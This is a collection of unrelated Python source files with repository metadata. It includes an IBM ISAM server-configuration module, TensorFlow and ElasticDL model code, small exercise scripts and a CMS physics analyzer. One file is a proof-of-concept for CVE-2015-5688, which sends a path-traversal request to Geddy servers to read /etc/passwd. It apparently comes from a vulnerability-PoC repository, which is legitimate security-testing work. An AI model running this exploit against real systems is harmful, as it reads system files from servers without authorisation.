requires_version=requires_version, requires_modules=requires_modulers))
def get_all(isamAppliance, service_name, check_mode=False, force=False):
"""
Retrieves a list of servers under a specified service
"""
return isamAppliance.invoke_get("Retrieving servers for a service",
"{0}{1}/servers".format(module_uri, service_name),
requires_version=requires_version, requires_modules=requires_modulers)
def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None,
check_mode=False,
force=False):
"""
Updating server
"""
change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure,
ssllabel)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put("Updating a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
{
"address": new_address,
"active": active,
"port": new_port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_modules=requires_modulers,
requires_version=requires_version)
else:
return isamAppliance.create_return_object()
def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False,
ssllabel=None):
"""
idempontency test
"""
org_obj = get(isamAppliance, service_name, address)
if org_obj['data']['address'] != new_address:
return True
elif org_obj['data']['active'] != active:
return True
elif org_obj['data']['port'] != new_port:
return True
elif org_obj['data']['weight'] != weight:
return True
elif org_obj['data']['secure'] != secure:
return True
elif org_obj['data']['ssllabel'] != ssllabel:
return True
else:
return False
def _check_exist(isamAppliance, service_name, address):
"""
idempotency test for delete function
"""
check_obj = {}
# Check weather the address with corresponding server exists
try:
check_obj = get(isamAppliance, service_name, address)
except:
return False
return True
def compare(isamAppliance1, isamAppliance2):
"""
Compare cluster configuration between two appliances
"""
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| 38.195946
| 120
| 0.552096
|
import ibmsecurity.utilities.tools
import logging
logger = logging.getLogger(__name__)
module_uri = "/isam/felb/configuration/services/"
requires_modulers = None
requires_version = None
def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False):
change_required = _check_exist(isamAppliance, service_name, address, port=port)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Creating a server",
"{0}{1}/servers".format(module_uri, service_name, address),
{
"active": active,
"address": address,
"port": port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def delete(isamAppliance, service_name, address, check_mode=False, force=False):
if force is True or _check_exist(isamAppliance, service_name, address) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete("Deleting a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers)
else:
return isamAppliance.create_return_object()
def get(isamAppliance, service_name, address, check_mode=False, force=False):
return (
isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address),
requires_version=requires_version, requires_modules=requires_modulers))
def get_all(isamAppliance, service_name, check_mode=False, force=False):
return isamAppliance.invoke_get("Retrieving servers for a service",
"{0}{1}/servers".format(module_uri, service_name),
requires_version=requires_version, requires_modules=requires_modulers)
def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None,
check_mode=False,
force=False):
change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure,
ssllabel)
if force is True or change_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put("Updating a server",
"{0}{1}/servers/{2}".format(module_uri, service_name, address),
{
"address": new_address,
"active": active,
"port": new_port,
"weight": weight,
"secure": secure,
"ssllabel": ssllabel
},
requires_modules=requires_modulers,
requires_version=requires_version)
else:
return isamAppliance.create_return_object()
def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False,
ssllabel=None):
org_obj = get(isamAppliance, service_name, address)
if org_obj['data']['address'] != new_address:
return True
elif org_obj['data']['active'] != active:
return True
elif org_obj['data']['port'] != new_port:
return True
elif org_obj['data']['weight'] != weight:
return True
elif org_obj['data']['secure'] != secure:
return True
elif org_obj['data']['ssllabel'] != ssllabel:
return True
else:
return False
def _check_exist(isamAppliance, service_name, address):
check_obj = {}
try:
check_obj = get(isamAppliance, service_name, address)
except:
return False
return True
def compare(isamAppliance1, isamAppliance2):
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| true
| true
|
f705c13bef4357c4b974d68a76c4f8617f700d7c
| 1,417
|
py
|
Python
|
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:15:42.000Z
|
2019-10-10T06:15:42.000Z
|
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/version.py
|
bolcom/probability
|
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
|
[
"Apache-2.0"
] | 1
|
2020-05-27T19:42:06.000Z
|
2020-05-27T19:42:06.000Z
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define TensorFlow Probability version information."""
# We follow Semantic Versioning (https://semver.org/)
_MAJOR_VERSION = '0'
_MINOR_VERSION = '9'
_PATCH_VERSION = '0'
# When building releases, we can update this value on the release branch to
# reflect the current release candidate ('rc0', 'rc1') or, finally, the official
# stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a
# release branch, the current version is by default assumed to be a
# 'development' version, labeled 'dev'.
_VERSION_SUFFIX = 'dev'
# Example, '0.4.0-dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
| 38.297297
| 80
| 0.703599
|
_MAJOR_VERSION = '0'
_MINOR_VERSION = '9'
_PATCH_VERSION = '0'
_VERSION_SUFFIX = 'dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
| true
| true
|
f705c143029f1b8fb5a082a334e82961e60babb9
| 3,371
|
py
|
Python
|
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
model_zoo/mnist/mnist_functional_api.py
|
zuston/elasticdl
|
601609fd44f826a2f5ea209443124b2c9a2f9ccb
|
[
"MIT"
] | null | null | null |
# Copyright 2020 The ElasticDL Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import PIL.Image
import tensorflow as tf
from elasticdl.python.common.constants import Mode
def custom_model():
inputs = tf.keras.Input(shape=(28, 28), name="image")
x = tf.keras.layers.Reshape((28, 28, 1))(inputs)
x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x)
x = tf.keras.layers.Dropout(0.25)(x)
x = tf.keras.layers.Flatten()(x)
outputs = tf.keras.layers.Dense(10)(x)
return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model")
def prepare_data_for_a_single_file(file_object, filename):
"""
:param filename: training data file name
:param file_object: a file object associated with filename
"""
label = int(filename.split("/")[-2])
image = PIL.Image.open(file_object)
numpy_image = np.array(image)
example_dict = {
"image": tf.train.Feature(
float_list=tf.train.FloatList(value=numpy_image.flatten())
),
"label": tf.train.Feature(
int64_list=tf.train.Int64List(value=[label])
),
}
example = tf.train.Example(
features=tf.train.Features(feature=example_dict)
)
return example.SerializeToString()
def loss(labels, predictions):
labels = tf.reshape(labels, [-1])
return tf.reduce_mean(
input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=predictions, labels=labels
)
)
def optimizer(lr=0.01):
return tf.optimizers.SGD(lr)
def feed(dataset, mode, _):
def _parse_data(record):
if mode == Mode.PREDICTION:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32)
}
else:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32),
"label": tf.io.FixedLenFeature([1], tf.int64),
}
r = tf.io.parse_single_example(record, feature_description)
features = {
"image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0)
}
if mode == Mode.PREDICTION:
return features
else:
return features, tf.cast(r["label"], tf.int32)
dataset = dataset.map(_parse_data)
if mode == Mode.TRAINING:
dataset = dataset.shuffle(buffer_size=1024)
return dataset
def eval_metrics_fn():
return {
"accuracy": lambda labels, predictions: tf.equal(
tf.argmax(predictions, 1, output_type=tf.int32),
tf.cast(tf.reshape(labels, [-1]), tf.int32),
)
}
| 32.413462
| 77
| 0.644616
|
import numpy as np
import PIL.Image
import tensorflow as tf
from elasticdl.python.common.constants import Mode
def custom_model():
inputs = tf.keras.Input(shape=(28, 28), name="image")
x = tf.keras.layers.Reshape((28, 28, 1))(inputs)
x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x)
x = tf.keras.layers.Dropout(0.25)(x)
x = tf.keras.layers.Flatten()(x)
outputs = tf.keras.layers.Dense(10)(x)
return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model")
def prepare_data_for_a_single_file(file_object, filename):
label = int(filename.split("/")[-2])
image = PIL.Image.open(file_object)
numpy_image = np.array(image)
example_dict = {
"image": tf.train.Feature(
float_list=tf.train.FloatList(value=numpy_image.flatten())
),
"label": tf.train.Feature(
int64_list=tf.train.Int64List(value=[label])
),
}
example = tf.train.Example(
features=tf.train.Features(feature=example_dict)
)
return example.SerializeToString()
def loss(labels, predictions):
labels = tf.reshape(labels, [-1])
return tf.reduce_mean(
input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=predictions, labels=labels
)
)
def optimizer(lr=0.01):
return tf.optimizers.SGD(lr)
def feed(dataset, mode, _):
def _parse_data(record):
if mode == Mode.PREDICTION:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32)
}
else:
feature_description = {
"image": tf.io.FixedLenFeature([28, 28], tf.float32),
"label": tf.io.FixedLenFeature([1], tf.int64),
}
r = tf.io.parse_single_example(record, feature_description)
features = {
"image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0)
}
if mode == Mode.PREDICTION:
return features
else:
return features, tf.cast(r["label"], tf.int32)
dataset = dataset.map(_parse_data)
if mode == Mode.TRAINING:
dataset = dataset.shuffle(buffer_size=1024)
return dataset
def eval_metrics_fn():
return {
"accuracy": lambda labels, predictions: tf.equal(
tf.argmax(predictions, 1, output_type=tf.int32),
tf.cast(tf.reshape(labels, [-1]), tf.int32),
)
}
| true
| true
|
f705c37d2339c79f6a9a632cefaf65a79808d37d
| 1,720
|
py
|
Python
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Geddy before v13.0.8 LFI''',
"description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''',
"severity": "high",
"references": [
"https://nodesecurity.io/advisories/geddy-directory-traversal",
"https://github.com/geddy/geddy/issues/697"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2015", "geddy", "lfi"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| 26.875
| 239
| 0.533721
|
import requests
def info():
return {
"author": "cckuailong",
"name": '''Geddy before v13.0.8 LFI''',
"description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''',
"severity": "high",
"references": [
"https://nodesecurity.io/advisories/geddy-directory-traversal",
"https://github.com/geddy/geddy/issues/697"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2015", "geddy", "lfi"],
}
def fingerprint(url):
return True
def poc(url):
result = {}
try:
url = format_url(url)
path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
def exp(url):
return poc(url)
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| true
| true
|
f705c380c38b745a99107f2f972df3893011b4c5
| 64
|
py
|
Python
|
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
Factorial digit sum/main.py
|
Skogrine/ProjectEuler
|
40e104ac91852dec66b5b7938d6553d1bbdc590f
|
[
"Apache-2.0"
] | null | null | null |
import math
n = 100
print(sum(map(int, str(math.factorial(n)))))
| 21.333333
| 44
| 0.703125
|
import math
n = 100
print(sum(map(int, str(math.factorial(n)))))
| true
| true
|
f705c4e287fb6d6f6989f47abb2afa301f8bd782
| 2,415
|
py
|
Python
|
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
blend.py
|
andrewdownie/BlendAway
|
daf73b22c29dfa905fbe8e838188d4df5861ae5d
|
[
"MIT"
] | null | null | null |
import os
import sys
import numpy as np
import cv2
import statistics
import datetime
def getMedian(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.median_grouped(values)
def getMean(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.mean(values)
def getMode(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
try:
mode = statistics.mode(values)
return mode
except statistics.StatisticsError: # all values are the same
return getMedian(arr,x,y)
method = sys.argv[1]
imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] # image
#direct = os.getcwd() + "/images/" # where to get test images
#saved = os.getcwd() + "/saved/" # where to get test images
direct = "/var/www/html/" # where to get test images
saved = "/var/www/html/" # where to get test images
i=0
images = []
for img in imgs:
image = cv2.imread(direct + img) # open template image
images.append(image)
(height, width) = image.shape[:2] # get dimensions
red = []
green = []
blue = []
for image in images:
redMatrix = [[0 for x in range(width)] for y in range(height)]
greenMatrix = [[0 for x in range(width)] for y in range(height)]
blueMatrix = [[0 for x in range(width)] for y in range(height)]
for x in range(height):
for y in range(width):
redMatrix[x][y] = image[x,y,0]
greenMatrix[x][y] = image[x,y,1]
blueMatrix[x][y] = image[x,y,2]
red.append(redMatrix)
green.append(greenMatrix)
blue.append(blueMatrix)
newImage = np.zeros((height,width,3), np.uint8)
for x in range(height):
for y in range(width):
rgb = []
if(method == "median"):
redMedian = getMedian(red,x,y)
greenMedian = getMedian(green,x,y)
blueMedian = getMedian(blue,x,y)
if(method == "mean"):
redMedian = getMean(red,x,y)
greenMedian = getMean(green,x,y)
blueMedian = getMean(blue,x,y)
if(method == "mode"):
redMedian = getMode(red,x,y)
greenMedian = getMode(green,x,y)
blueMedian = getMode(blue,x,y)
rgb.append(redMedian)
rgb.append(greenMedian)
rgb.append(blueMedian)
newImage[x][y] = rgb
cv2.imwrite(saved + "results.jpg", newImage) # save image
| 25.15625
| 68
| 0.59089
|
import os
import sys
import numpy as np
import cv2
import statistics
import datetime
def getMedian(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.median_grouped(values)
def getMean(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
return statistics.mean(values)
def getMode(arr, x, y):
values = []
for a in arr:
values.append(a[x][y])
try:
mode = statistics.mode(values)
return mode
except statistics.StatisticsError:
return getMedian(arr,x,y)
method = sys.argv[1]
imgs = ["1.png","2.png", "3.png", "4.png", "5.png"]
"
i=0
images = []
for img in imgs:
image = cv2.imread(direct + img)
images.append(image)
(height, width) = image.shape[:2]
red = []
green = []
blue = []
for image in images:
redMatrix = [[0 for x in range(width)] for y in range(height)]
greenMatrix = [[0 for x in range(width)] for y in range(height)]
blueMatrix = [[0 for x in range(width)] for y in range(height)]
for x in range(height):
for y in range(width):
redMatrix[x][y] = image[x,y,0]
greenMatrix[x][y] = image[x,y,1]
blueMatrix[x][y] = image[x,y,2]
red.append(redMatrix)
green.append(greenMatrix)
blue.append(blueMatrix)
newImage = np.zeros((height,width,3), np.uint8)
for x in range(height):
for y in range(width):
rgb = []
if(method == "median"):
redMedian = getMedian(red,x,y)
greenMedian = getMedian(green,x,y)
blueMedian = getMedian(blue,x,y)
if(method == "mean"):
redMedian = getMean(red,x,y)
greenMedian = getMean(green,x,y)
blueMedian = getMean(blue,x,y)
if(method == "mode"):
redMedian = getMode(red,x,y)
greenMedian = getMode(green,x,y)
blueMedian = getMode(blue,x,y)
rgb.append(redMedian)
rgb.append(greenMedian)
rgb.append(blueMedian)
newImage[x][y] = rgb
cv2.imwrite(saved + "results.jpg", newImage)
| true
| true
|
f705c4fc494cdf40b01b01fb964de724d9ee0942
| 1,205
|
py
|
Python
|
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
AccessKeysInDictionary.py
|
Snehasis124/PythonTutorials
|
133060cd4f2126dbc427a724b831834e90c26fdc
|
[
"Apache-2.0"
] | null | null | null |
#9TH PROGRAM
# THIS PROGRAM WILL HELP IN ACCESSING DICTIONARY ITEMS AND PERFROM CERTAIN OPERATIONS WITH DICTIONARY
ages = {} #EMPTY DICTIONARY
ages["Micky"] = 24
ages["Lucky"] = 25
print(ages)
keys = ages.keys # .keys prints all the keys avaialble in Dictionary
print(keys)
values = ages.values # .values prints all the values avaialble in Dictionary
print(values)
print(sorted(ages))
# NOTE Unable to sort print(sorted(ages.values))
print(ages.values) # Prints the values
# NOTE has_key() has been replaced by "in" in Python 3 , You can access like below.
# Syntax : "Values" in "dict"
if("Micky" in ages):
print("Micky is there")
else:
print("Micky is not there")
print(len(ages)) # Print the length of the dictionary
#Adding new item
# New initialization
ages = {"Snehasis" : "24" , "Sradhasis" : 25}
print(ages)
# New members
ages["LKP"] = 45 # Here value is saved as int
if("LKP" in ages):
updatedValue = ages.get("LKP") + 10
print("Updated Value = " , updatedValue)
print(ages)
ages["JYOTI"] = "38" # Here value is saved as string
if("JYOTI" in ages):
updatedValue = ages.get("JYOTI") + " New Age"
print("Updated Value = " , updatedValue)
print(ages)
| 23.173077
| 101
| 0.687137
|
ages = {}
ages["Micky"] = 24
ages["Lucky"] = 25
print(ages)
keys = ages.keys
print(keys)
values = ages.values
print(values)
print(sorted(ages))
print(ages.values)
if("Micky" in ages):
print("Micky is there")
else:
print("Micky is not there")
print(len(ages))
ages = {"Snehasis" : "24" , "Sradhasis" : 25}
print(ages)
ages["LKP"] = 45
if("LKP" in ages):
updatedValue = ages.get("LKP") + 10
print("Updated Value = " , updatedValue)
print(ages)
ages["JYOTI"] = "38"
if("JYOTI" in ages):
updatedValue = ages.get("JYOTI") + " New Age"
print("Updated Value = " , updatedValue)
print(ages)
| true
| true
|
f705c51665ca83673376bc29d03db188df991c5f
| 2,970
|
py
|
Python
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
from __future__ import print_function
import itertools
from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer
from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle
from PhysicsTools.HeppyCore.framework.event import Event
from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters
from DataFormats.FWLite import Events, Handle,Lumis
class SkimAnalyzerCount( Analyzer ):
#---------------------------------------------
# TO FINDS THE INITIAL EVENTS BEFORE THE SKIM
#---------------------------------------------
def __init__(self, cfg_ana, cfg_comp, looperName):
super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName)
self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False
self.verbose = getattr(self.cfg_ana, 'verbose', False)
def declareHandles(self):
super(SkimAnalyzerCount, self).declareHandles()
self.counterHandle = Handle("edm::MergeableCounter")
self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' )
def beginLoop(self, setup):
super(SkimAnalyzerCount,self).beginLoop(setup)
self.counters.addCounter('SkimReport')
self.count = self.counters.counter('SkimReport')
self.count.register('All Events')
if self.cfg_comp.isMC:
self.count.register('Sum Weights')
if not self.useLumiBlocks:
#print 'Will actually count events instead of accessing lumi blocks'
return True
print('Counting the total events before the skim by accessing luminosity blocks')
lumis = Lumis(self.cfg_comp.files)
totalEvents=0
for lumi in lumis:
if lumi.getByLabel('prePathCounter',self.counterHandle):
totalEvents+=self.counterHandle.product().value
else:
self.useLumiBlocks = False
break
if self.useLumiBlocks:
self.count.inc('All Events',totalEvents)
if self.cfg_comp.isMC:
self.count.inc('Sum Weights',totalEvents)
print('Done -> proceeding with the analysis')
else:
print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)')
def process(self, event):
if self.verbose:
print("\nProcessing run:lumi:event %d:%d:%d" % (
event.input.eventAuxiliary().id().run(),
event.input.eventAuxiliary().id().luminosityBlock(),
event.input.eventAuxiliary().id().event()))
if not self.useLumiBlocks:
self.readCollections( event.input )
self.count.inc('All Events')
if self.cfg_comp.isMC:
self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight())
return True
| 40.684932
| 121
| 0.619865
|
from __future__ import print_function
import itertools
from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer
from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle
from PhysicsTools.HeppyCore.framework.event import Event
from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters
from DataFormats.FWLite import Events, Handle,Lumis
class SkimAnalyzerCount( Analyzer ):
    """Count events processed before any skim was applied.

    Maintains a 'SkimReport' counter with the total number of events and,
    for MC samples, the sum of generator weights.  When the optional
    cfg_ana.useLumiBlocks flag is set, the pre-skim totals are read from
    the 'prePathCounter' product stored in the input luminosity blocks
    instead of being accumulated event by event.
    """
    def __init__(self, cfg_ana, cfg_comp, looperName):
        super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName)
        # Optional flag: read pre-skim totals from lumi blocks instead of
        # incrementing counters per event.
        self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False
        # Optional flag: print run:lumi:event for every processed event.
        self.verbose = getattr(self.cfg_ana, 'verbose', False)
    def declareHandles(self):
        """Declare the FWLite handles used to read lumi counters and MC generator info."""
        super(SkimAnalyzerCount, self).declareHandles()
        self.counterHandle = Handle("edm::MergeableCounter")
        self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' )
    def beginLoop(self, setup):
        """Register counters; optionally pre-fill them from luminosity blocks.

        Falls back to per-event counting (useLumiBlocks = False) as soon as
        any lumi block lacks the 'prePathCounter' product.
        """
        super(SkimAnalyzerCount,self).beginLoop(setup)
        self.counters.addCounter('SkimReport')
        self.count = self.counters.counter('SkimReport')
        self.count.register('All Events')
        if self.cfg_comp.isMC:
            self.count.register('Sum Weights')
        if not self.useLumiBlocks:
            return True
        print('Counting the total events before the skim by accessing luminosity blocks')
        lumis = Lumis(self.cfg_comp.files)
        totalEvents=0
        for lumi in lumis:
            if lumi.getByLabel('prePathCounter',self.counterHandle):
                totalEvents+=self.counterHandle.product().value
            else:
                # Counter missing in this lumi block: revert to per-event counting.
                self.useLumiBlocks = False
                break
        if self.useLumiBlocks:
            self.count.inc('All Events',totalEvents)
            if self.cfg_comp.isMC:
                # NOTE(review): the weight sum is approximated by the plain event
                # count here; per-event generator weights are not available from
                # the lumi-block counter.
                self.count.inc('Sum Weights',totalEvents)
            print('Done -> proceeding with the analysis')
        else:
            print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)')
    def process(self, event):
        """Count one event (and its MC weight) unless lumi blocks already provided totals."""
        if self.verbose:
            print("\nProcessing run:lumi:event %d:%d:%d" % (
                event.input.eventAuxiliary().id().run(),
                event.input.eventAuxiliary().id().luminosityBlock(),
                event.input.eventAuxiliary().id().event()))
        if not self.useLumiBlocks:
            self.readCollections( event.input )
            self.count.inc('All Events')
            if self.cfg_comp.isMC:
                self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight())
        return True
| true
| true
|
f705c5f7c4974cac5efeddeb4787732c80472742
| 114
|
py
|
Python
|
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
# Admin registrations for the blog app.
from django.contrib import admin
from .models import blog
# Expose the blog model in the Django admin site.
admin.site.register(blog)
| 19
| 32
| 0.798246
|
from django.contrib import admin
from .models import blog
admin.site.register(blog)
| true
| true
|
f705c6c1705b01df89f15b731ab6fc18b82c61cd
| 6,579
|
py
|
Python
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
